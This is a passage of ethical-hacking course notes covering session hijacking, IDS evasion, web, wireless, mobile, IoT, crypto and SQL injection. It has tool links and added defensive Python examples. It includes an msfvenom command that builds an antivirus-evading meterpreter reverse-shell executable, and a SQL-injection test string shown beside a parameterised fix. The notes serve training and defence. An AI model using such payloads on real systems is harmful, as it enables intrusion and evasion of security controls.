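            acks[src] += 1
    suspects = {}
    for src, n in syns.items():
        share = n / (n + acks[src])
        if n >= min_syns and share >= ratio:
            suspects[src] = round(share, 3)
    return suspects


def sample_traffic() -> list:
    """Constructed mix: one normal web session and one flooding source."""
    syn, ack_psh = TCP_FLAGS["SYN"], TCP_FLAGS["ACK"] | TCP_FLAGS["PSH"]
    normal = [("10.0.2.15", build_tcp_header(51000, 80, syn))]
    normal += [("10.0.2.15", build_tcp_header(51000, 80, ack_psh))] * 40
    flood = [("10.0.2.99", build_tcp_header(40000 + i, 80, syn)) for i in range(50)]
    return normal + flood


if __name__ == "__main__":
    print(decode_flags(build_tcp_header(80, 51000, TCP_FLAGS["SYN"] | TCP_FLAGS["ACK"])))
    print(syn_flood_suspects(sample_traffic()))
```

The `min_syns` and `ratio` arguments are the "metrics to reflect normal boundaries" from the list: tune them from a baseline capture of your own network before alerting on them.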
Repose
is an open-source, RESTful, middleware platform that transparently integrates with your existing infrastructure. Repose provides highly scalable and extensible solutions to API processing tasks such as authentication, rate limiting, API validation, HTTP request logging, and much more.
https://repose.atlassian.net/wiki/spaces/REPOSE/overview
Project Shield
Project Shield, created by Google Cloud and Jigsaw and powered by Google Cloud Armor, provides free unlimited protection against DDoS attacks, a type of digital attack used to censor information by taking websites offline
https://projectshield.withgoogle.com/landing
Peershark
https://github.com/pratiknarang/peershark
https://ieeexplore.ieee.org/document/9642767
https://www.ieee-security.org/TC/SPW2014/papers/5103a108.PDF
NIST
Resilient Interdomain Traffic Exchange:
BGP Security and DDoS Mitigation
https://csrc.nist.gov/publications/detail/sp/800-189/final
Resilient Interdomain Traffic Exchange: BGP Security and DDoS Mitigation
39 control plane and BGP security recommendations
26 DDoS mitigation recommendations
12 recommendations for source address validations
7 recommendations for port Filtering
1 recommendation on rate limiting
6 recommendations on flow specification blackholing
IOT Distributed IDS
Chapter 11: Ethical Hacking: Session Hijacking By: Malcolm Shore
Intro to Session Hijacking
Stateless HTTP
Session IDs
PHP session array
Websocketd
http://websocketd.com/
https://github.com/joewalnes/websocketd
Establishing Man in the Middle
Web proxy
ARP poisoning
Malicious Wifi
Cookie hijacking
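Since HTTP is stateless, everything about the session lives in the ID the server hands out, which is why cookie hijacking works when that ID is guessable, long-lived, or accepted from any client. As an added example (not code from the course), the store below shows the server-side controls that limit what a captured cookie is worth: a CSPRNG-generated ID, an `HttpOnly; Secure; SameSite` cookie, expiry, re-issue on login, and binding to a client fingerprint. The fingerprint strings (`fp-A`, `fp-B`) and cookie name `SESSIONID` are assumptions for the demo.

```python
import hashlib
import hmac
import secrets
import time

# Added example (not from the course): a session store with the defences
# that blunt cookie hijacking. The "fingerprint" is whatever stable client
# attribute you choose to bind to (constructed strings in the demo).


class SessionStore:
    def __init__(self, ttl_seconds: int = 900):
        self.ttl = ttl_seconds
        self._sessions = {}

    @staticmethod
    def _fp_hash(fingerprint: str) -> str:
        return hashlib.sha256(fingerprint.encode()).hexdigest()

    def create(self, user: str, fingerprint: str, now=None) -> str:
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(32)       # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user": user,
                               "fp": self._fp_hash(fingerprint),
                               "expires": now + self.ttl}
        return sid

    def validate(self, sid: str, fingerprint: str, now=None):
        """Return the user for a live session presented by the same client,
        or None. Expired entries are dropped on sight."""
        now = time.time() if now is None else now
        s = self._sessions.get(sid)
        if s is None or now >= s["expires"]:
            self._sessions.pop(sid, None)
            return None
        if not hmac.compare_digest(s["fp"], self._fp_hash(fingerprint)):
            return None                       # cookie replayed from elsewhere
        return s["user"]

    def rotate(self, sid: str, fingerprint: str, now=None):
        """Issue a fresh ID after login or a privilege change so an ID seen
        before authentication is worthless afterwards (session fixation)."""
        user = self.validate(sid, fingerprint, now)
        if user is None:
            return None
        self._sessions.pop(sid)
        return self.create(user, fingerprint, now)


def set_cookie_header(sid: str, name: str = "SESSIONID", max_age: int = 900) -> str:
    """HttpOnly keeps scripts away from the ID, Secure keeps it off plain
    HTTP (the MITM cases above), SameSite=Strict stops cross-site sends."""
    return (f"Set-Cookie: {name}={sid}; Path=/; Max-Age={max_age}; "
            "HttpOnly; Secure; SameSite=Strict")


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("alice", "fp-A")
    print(set_cookie_header(sid))
    print("same client:", store.validate(sid, "fp-A"))
    print("other client:", store.validate(sid, "fp-B"))
```

The `now` parameter exists so expiry can be tested deterministically; in production leave it unset and the store uses the wall clock.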
Tampermonkey:-
https://www.tampermonkey.net/
https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo?hl=en
Subterfuge-Framework /Framework for Man-In-The-Middle attacks
https://github.com/Subterfuge-Framework/Subterfuge
ARP poisoning
Cain and Abel
https://sectools.org/tool/cain/
PUTTY
https://www.putty.org/
PuttyRider
Hijack Putty sessions in order to sniff conversation and inject Linux commands.
https://github.com/seastorm/PuttyRider
DNS Hijacking
Cloud hijacking
API Key Hijack
Hijacking the Physical World
Vehicle wiring Diagram
Parrot Drone
UDP 5554- telemetry data
TCP 5555- streaming video
UDP 5556- flight commands
UDP 5559- critical data
Acrylic Wi-Fi Home – WiFi Scanner
https://www.acrylicwifi.com/en/wlan-wifi-wireless-network-software-tools/wlan-scanner-acrylic-wifi-free/
Enhanced Kamkar attack
Telnet connection
Add firewall rule
Laptop application to control drone
Photography Drone
2.4GHz radio control link
XBee telemetry link
5.8GHz streaming video link
Telemetry Channel attacks
Detect all ZigBee station
Delete the mac address and set attackers mac address
Pair victim with attacker
Chapter 12: Ethical Hacking: Evading IDS, Firewalls, and Honeypots. By: Malcolm Shore
Firewall
Windows Firewall
Windows Defender Firewall Properties
Public Profile
Inbound connections = Block all connections
Settings -> Customize -> Allow unicast response = No (set to No for the stricter default)
Logging->Customize->
Log Dropped packets = Yes
Log Successful connections = yes
Windows DNS Log Analyser
https://support.moonpoint.com/reviews/software/windows/network/dns/WDLA/
Linux Firewall
iptables
┌──(kali㉿kali)-[~]
└─$ sudo iptables -L -n -v
┌──(kali㉿kali)-[~]
└─$ cat /var/log/kern.log
Networking using GNS3
GNS3 : https://www.gns3.com/
All in one:-
https://github.com/GNS3/gns3-gui/releases
Tour of GNS3
Basic operation
Routed network
ASA secure enclave
Honeypots
Target to lure attackers
Identify and prosecute
Monitor and analyze
Types of honey pots
Low interaction
High interaction
Honeynets
sinkhole
https://www.honeynet.org/projects/
This page contains a list of tools and services that we use on a regular basis. Most of these tools have been created by our members and participating GSoc students, but some are also external and not affiliated with the Honeynet Project. We hope you find the below link collection useful.
Protection from Intrusion
Blacklist the websites
Whitelist
Just add the sites to be allowed
This is easier than maintaining the blacklist
Snort
Log and Alert output
alert_fast
alert_full
Default directory /var/log/snort/
alert_syslog
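The `alert_fast` output is one line per event, which makes it the easiest Snort format to post-process. As an added example (not code from the course or the Snort project), the block below parses that line format and summarises alerts by priority and source. The sample lines are constructed for the demo: the rule messages are invented, and the SIDs 1000001 to 1000003 sit in the range Snort reserves for local rules rather than referring to any published rule.

```python
import re
from collections import Counter

# Added example (not from the course): parse Snort alert_fast lines.
# SAMPLE_ALERTS is constructed data (invented local rules and addresses).
SAMPLE_ALERTS = """\
08/28-13:02:17.123456  [**] [1:1000001:1] LOCAL SMB share enumeration probe [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.0.2.15:51234 -> 10.0.2.4:445
08/28-13:02:18.004210  [**] [1:1000002:1] LOCAL NetBIOS name query sweep [**] [Classification: Attempted Information Leak] [Priority: 2] {UDP} 10.0.2.15:137 -> 10.0.2.4:137
08/28-13:02:19.777001  [**] [1:1000003:1] LOCAL ICMP echo burst [**] [Priority: 3] {ICMP} 10.0.2.15 -> 10.0.2.4
this line is not an alert and must be skipped
"""

# timestamp [**] [gid:sid:rev] msg [**] [Classification: ...] [Priority: n] {proto} src -> dst
ALERT_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s*"
    r"(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s*)?"     # absent for some rules
    r"\[Priority:\s*(?P<prio>\d+)\]\s+"
    r"\{(?P<proto>\w+)\}\s+(?P<src>\S+)\s+->\s+(?P<dst>\S+)\s*$"
)


def _split_endpoint(endpoint: str, proto: str):
    """'10.0.2.4:445' -> ('10.0.2.4', 445); ICMP endpoints carry no port."""
    if proto in ("TCP", "UDP") and ":" in endpoint:
        ip, port = endpoint.rsplit(":", 1)
        return ip, int(port)
    return endpoint, None


def parse_alert_fast(text: str) -> list:
    """Return one dict per well-formed alert line; other lines are ignored."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.match(line)
        if not m:
            continue
        src_ip, src_port = _split_endpoint(m["src"], m["proto"])
        dst_ip, dst_port = _split_endpoint(m["dst"], m["proto"])
        alerts.append({
            "timestamp": m["ts"], "gid": int(m["gid"]), "sid": int(m["sid"]),
            "rev": int(m["rev"]), "msg": m["msg"], "classification": m["cls"],
            "priority": int(m["prio"]), "proto": m["proto"],
            "src_ip": src_ip, "src_port": src_port,
            "dst_ip": dst_ip, "dst_port": dst_port,
        })
    return alerts


def summarize(alerts: list) -> dict:
    """Counts a responder looks at first: by priority, source and rule."""
    return {
        "by_priority": Counter(a["priority"] for a in alerts),
        "by_src": Counter(a["src_ip"] for a in alerts),
        "by_sid": Counter(a["sid"] for a in alerts),
    }


if __name__ == "__main__":
    parsed = parse_alert_fast(SAMPLE_ALERTS)
    for a in parsed:
        print(a["priority"], a["proto"], a["src_ip"], "->", a["dst_ip"], a["dst_port"], a["msg"])
    print(summarize(parsed))
```

Point the same parser at `/var/log/snort/alert` on a sensor and the `by_src` counter becomes a quick list of which hosts are tripping the most rules.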
Suricata
Suricata is the leading independent open source threat detection engine. By combining intrusion detection (IDS), intrusion prevention (IPS), network security monitoring (NSM) and PCAP processing, Suricata can quickly identify, stop, and assess even the most sophisticated attacks.
Security Onion
Security Onion Solutions, LLC is the creator and maintainer of Security Onion, a free and open platform for threat hunting, network security monitoring, and log management. Security Onion includes best-of-breed free and open tools including Suricata, Zeek, Wazuh, the Elastic Stack and many others.
https://securityonionsolutions.com/
Evasion Techniques
Msfvenom
┌──(kali㉿kali)-[~]
└─$ msfvenom --list encoders
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=10.0.2.15 LPORT=4444 -e x86/shikata_ga_nai -i 100 -f exe -o venom.exe
Andromeda's Five Star Custom Packer – Hackers' Tactics Analyzed
Packer-based malware is malware which is modified in the runtime memory using different and sophisticated compression techniques. Such malware is hard to detect by known malware scanners and anti-virus solutions. In addition, it is a cheap way for hackers to recreate new signatures for the same malware on the fly simply by changing the encryption/packing method. Packers themselves are not malware; attackers use this tactic to obfuscate the code’s real intention.
https://blog.morphisec.com/andromeda-tactics-analyzed
Chapter 13: Ethical Hacking: Hacking Web Servers and Web Applications, By Malcolm Shore
Introduction to WEB Servers
Return Code from web servers
200 - processed OK
400 - bad request
403 - forbidden (access denied)
404 - not found
500 - internal server error
Tools
http://websocketd.com/
Google QUIC
burpsuite | Kali Linux Tools
https://www.kali.org/tools/burpsuite/
Testing vulnerable website
http://zero.webappsecurity.com/
OWASP WebGoat - Learn the hack - Stop the attack
https://owasp.org/www-project-webgoat/
Fingerprinting
whatweb
┌──(kali㉿kali)-[~]
└─$ whatweb http://zero.webappsecurity.com
http://zero.webappsecurity.com [200 OK] Apache, Bootstrap, Content-Language[en-US], Country[UNITED STATES][US], HTML5, HTTPServer[Apache-Coyote/1.1], IP, JQuery[1.8.2], Script[text/javascript], Title[Zero - Personal Banking - Loans - Credit Cards], UncommonHeaders[access-control-allow-origin], X-UA-Compatible[IE=Edge]
┌──(kali㉿kali)-[~]
└─$ whatweb -l | more
Web Security Dojo
A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo
https://www.mavensecurity.com/resources/web-security-dojo
Chapter 14: Ethical Hacking: Wireless Networks, by Malcolm Shore
Wi-Fi Networks
Speed Standards
Wireless security
Network key
Internet login
MAC filtering
Encryption- WEP, WPA, and WPA2
Connection -WPS
Signal aspects of wireless
Performance in dBi is measured against a benchmark (an isotropic radiator)
Gain is expressed in dBi (decibels relative to an isotropic radiator): the higher the figure, the stronger the antenna and the more reliable the communication. Sometimes performance is expressed in dBm, which is absolute signal power. dBm is related to milliwatts by dBm = 10 × log10(P in milliwatts).
When transmitting, a positive number represents better performance (gain) relative to the benchmark, and a negative number means lower performance (loss). 1,000 milliwatts, or 30 dBm, is rated as a good transmitter.
For reception the opposite is true: we want to receive weaker signals, and a good antenna should be able to operate down to about -90 dBm.
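The dBm/milliwatt relation and the 30 dBm / -90 dBm figures above, carried through as an added example (not from the notes). The free-space path loss formula and the link-margin calculation are generalisations beyond the notes; the 100 m / channel 6 values are constructed.

```python
import math

def mw_to_dbm(milliwatts):
    """Signal power in dBm: 10 * log10(P / 1 mW), the relation the notes describe."""
    if milliwatts <= 0:
        raise ValueError("power must be positive")
    return 10 * math.log10(milliwatts)

def dbm_to_mw(dbm):
    """Inverse of mw_to_dbm."""
    return 10 ** (dbm / 10)

def free_space_path_loss_db(distance_m, freq_mhz):
    """Free-space path loss (generalisation, not from the notes):
    FSPL = 20*log10(d_km) + 20*log10(f_MHz) + 32.44."""
    return 20 * math.log10(distance_m / 1000) + 20 * math.log10(freq_mhz) + 32.44

def link_margin_db(tx_dbm, tx_gain_dbi, rx_gain_dbi, path_loss_db, rx_floor_dbm=-90):
    """Received power = Tx power + both antenna gains (dBi) - path loss.
    Returns the headroom above the receiver floor (-90 dBm per the notes);
    a negative margin means the link will not work."""
    received_dbm = tx_dbm + tx_gain_dbi + rx_gain_dbi - path_loss_db
    return received_dbm - rx_floor_dbm

if __name__ == "__main__":
    print(f"1000 mW = {mw_to_dbm(1000):.1f} dBm")      # the 'good transmitter' figure
    print(f"-90 dBm = {dbm_to_mw(-90):.1e} mW")        # the receive floor
    loss = free_space_path_loss_db(100, 2437)          # 100 m at Wi-Fi channel 6 (constructed)
    print(f"margin at 100 m with 2 dBi antennas: {link_margin_db(30, 2, 2, loss):.1f} dB")
```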
Yagi antenna or fishbone antenna
Parabolic antenna
wifite | Kali Linux Tools
https://www.kali.org/tools/wifite/
reaver | Kali Linux Tools
https://www.kali.org/tools/reaver/
Reaver
Wash
Airmon-ng
https://www.aircrack-ng.org/doku.php?id=airmon-ng
Dragonblood
https://wpa3.mathyvanhoef.com/
Wifi Pineapple:
WiFi Pineapple - Hak5
fern
fern-wifi-cracker | Kali Linux Tools
https://www.kali.org/tools/fern-wifi-cracker/
MetaGeek | inSSIDer - Defeat Slow Wi-Fi
https://www.metageek.com/inssider/
fern-wifi-cracker | Kali Linux Tools
https://www.kali.org/tools/fern-wifi-cracker/
Bluetooth
Serial Port Profile SPP
Human Interface Device Profile HID
Hands-Free Profile HFP
Advanced Audio Distribution Profile A2DP
Audio/Video Remote Control Profile AVRCP
┌──(kali㉿kali)-[~]
└─$ lsusb
┌──(kali㉿kali)-[~]
└─$ sudo bluelog -l
┌──(kali㉿kali)-[~]
└─$ btscanner
┌──(kali㉿kali)-[~]
└─$ fang -h
Chapter 15: Ethical Hacking: Mobile Devices and Platforms, by Malcolm Shore
Mobile technology
OWASP Mobile Security methodologies
Effective testing
Static analysis
App source code
Reverse engineering
Clone runtime environment
Identify
All network interfaces
Network protocols
Component interactions
Data access
App interfaces
Encryption
Pinning
Certificate
Public key
Dynamic analysis
Changes to device storage
Info transmitted
Web app testing
Forensic analysis
Virtualization
OWASP Mobile Security Testing Guide
OWASP flagship project provides a security standard for mobile apps (OWASP MASVS) and a comprehensive testing guide (OWASP MSTG) that covers the processes, techniques, and tools used during a mobile app security test, as well as an exhaustive set of test cases that enables testers to deliver consistent and complete results.
https://owasp.org/www-project-mobile-security-testing-guide/
Android
Builds on the Linux security model
“*.dex” extensions are Dalvik executable files.
Download Android Studio & App Tools
https://developer.android.com/studio
Apktool - A tool for reverse engineering 3rd party, closed, binary Android apps.
https://ibotpeaches.github.io/Apktool/
Apk Files
https://www.apkfiles.com/
dex2jar download | SourceForge.net
https://sourceforge.net/projects/dex2jar/
dex2jar | Kali Linux Tools
https://www.kali.org/tools/dex2jar/
GitHub - skylot/jadx: Dex to Java decompiler
https://github.com/skylot/jadx
OWASP Security Shepherd
The OWASP Security Shepherd Project is a web and mobile application security training platform. Security Shepherd has been designed to foster and improve security awareness among a varied skill-set demographic. The aim of this project is to take AppSec novices or experienced engineers and sharpen their penetration testing skill set to security expert status.
https://owasp.org/www-project-security-shepherd/
Chapter 16: Ethical Hacking: Hacking IoT Devices, by Luciano Ferrari
Internet of Things
IoT Attacks
Lack of security
Vulnerable interfaces
Lack of firmware updates
OWASP Internet of Things
https://owasp.org/www-project-internet-of-things/
https://wiki.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Top_10
Type of attacks
DDoS
Rolling code attack
BlueBorne attack
Jamming attacks
Backdoor
Sybil
Side channel
Hacking Methodology
Information gathering
Vulnerability scanning
Launch attack
Gain access
Maintain access
Chapter 17: Ethical Hacking: Cryptography, by Stephanie Domas
Cryptography
Symmetric Cryptography
Asymmetric
Hashing
Ciphers
Plaintext
Block
Stream
DES - Data Encryption Standard
Replaced by AES
AES - Advanced Encryption Standard
RC - Rivest Cipher
Symmetric
Designed by Ron Rivest
RC4
RC5
RC6
ECC - Elliptic Curve Cryptography
Diffie-Hellman
Hybrid Cipher
Symmetric & Asymmetric combined together
Hashing
One way function
Used in passwords
MD5 - Message Digest 5
128-bit output
SHA - Secure Hash Algorithm
160-bit output (SHA-1)
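An added example (not from the notes) that checks the MD5 and SHA-1 output sizes listed above, shows the avalanche behaviour of a one-way function, and demonstrates how passwords are actually stored with a hash: salted and iterated (PBKDF2-HMAC-SHA256 here, an assumption) rather than a bare MD5/SHA-1 digest.

```python
import hashlib
import hmac
import os

def digest_bits(algorithm, data=b""):
    """Output length in bits of a hash algorithm, e.g. 128 for MD5 and 160 for SHA-1."""
    return hashlib.new(algorithm, data).digest_size * 8

def differing_bits(a, b):
    """Hamming distance between two digests (a small input change flips about half the bits)."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))

def hash_password(password, salt=None, iterations=600_000):
    """Salted, iterated PBKDF2-HMAC-SHA256 for password storage. A plain MD5/SHA-1 of
    the password is fast to brute-force and identical for identical passwords."""
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${key.hex()}"

def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algorithm, iterations, salt_hex, key_hex = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    key = hashlib.pbkdf2_hmac("sha256", password.encode(),
                              bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(key.hex(), key_hex)

if __name__ == "__main__":
    for name in ("md5", "sha1", "sha256"):
        print(name, digest_bits(name), "bits")
    d1 = hashlib.md5(b"password").digest()
    d2 = hashlib.md5(b"passwore").digest()
    print("bits changed by a one-character edit:", differing_bits(d1, d2), "of 128")
    record = hash_password("correct horse")          # fresh random salt each time
    print(verify_password("correct horse", record), verify_password("wrong", record))
```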
Digital Certificates
Authorized Agency Verification
CA - Certificate authority verification
Digital Certificate X.509
Version
Serial no
Algorithm ID
Issuer
Validity
DSA - Digital Signature Algorithm
PKI - Public Key Infrastructure
Certificate management system
Digital certificate
CRL - Certificate Revocation List
CA - Certificate Authority
RA - Registration Authority
End user
New Secure Protocols
S/MIME - Secure MIME - added digital signature, public key encryption to emails
PGP - Pretty good privacy - similar to PKI
SSH - Secure Shell - encrypted channel for remote command execution on a system.
Real world exploits
Distributed.net
Electronic Frontier Foundation EFF
Electronic Frontier Foundation
https://www.eff.org
Heartbleed
https://heartbleed.com/
POODLE - "Padding Oracle On Downgraded Legacy Encryption"
DROWN - Decrypting RSA with Obsolete and Weakened eNcryption
https://drownattack.com/
FREAK ("Factoring RSA Export Keys")
Chapter 18: Ethical Hacking: Cloud Computing, by Daniel Lachance
Cloud Overview
XaaS
SaaS
PaaS
IaaS
Cloud Identity Management
MFA Multi Factor Authentication
RBAC Role-Based Access Control
Cloud High Availability
Business Continuity and Risk Management
Identify assets
Identify threats to assets
Identify threat likelihood
Data Replication
Application Resiliency
GDPR General Data Protection Regulation
PCI DSS - Payment Card Industry Data Security Standard
Chapter 19: Ethical Hacking: SQL Injection, by Malcolm Shore
Testing SQL Injection
OWASP Security Shepherd
https://owasp.org/www-project-security-shepherd/
┌──(kali㉿kali)-[~]
└─$ service mysql start
┌──(kali㉿kali)-[~]
└─$ sudo mysql -u root -p
MariaDB [(none)]> show databases;
MariaDB [(none)]> use information_schema;
MariaDB [information_schema]> show tables;
MariaDB [information_schema]> use mysql
MariaDB [mysql]> show databases;
MariaDB [mysql]> show tables;
MariaDB [mysql]> show columns from user;
MariaDB [mysql]> select user,password from user;
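To see why the user/password query above is worth protecting, here is an added example (not from the notes) with a vulnerable login query next to its parameterised fix, using an in-memory SQLite table as a constructed stand-in for the MariaDB `user` table.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the 'user' table; rows and passwords are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)",
                     [("root", "toor"), ("alice", "hunter2")])
    return conn

def login_vulnerable(conn, user, password):
    """Input is spliced into the SQL text, so a quote in the input rewrites the query."""
    sql = (f"SELECT user FROM user WHERE user = '{user}' "
           f"AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]

def login_safe(conn, user, password):
    """Parameterised query: the driver binds input as data, never as SQL tokens."""
    sql = "SELECT user FROM user WHERE user = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (user, password))]

if __name__ == "__main__":
    conn = make_db()
    payload = "' OR '1'='1"      # classic test string; turns the WHERE clause into always-true
    print("vulnerable, real password:", login_vulnerable(conn, "alice", "hunter2"))
    print("vulnerable, test payload: ", login_vulnerable(conn, "alice", payload))
    print("parameterised, payload:   ", login_safe(conn, "alice", payload))
```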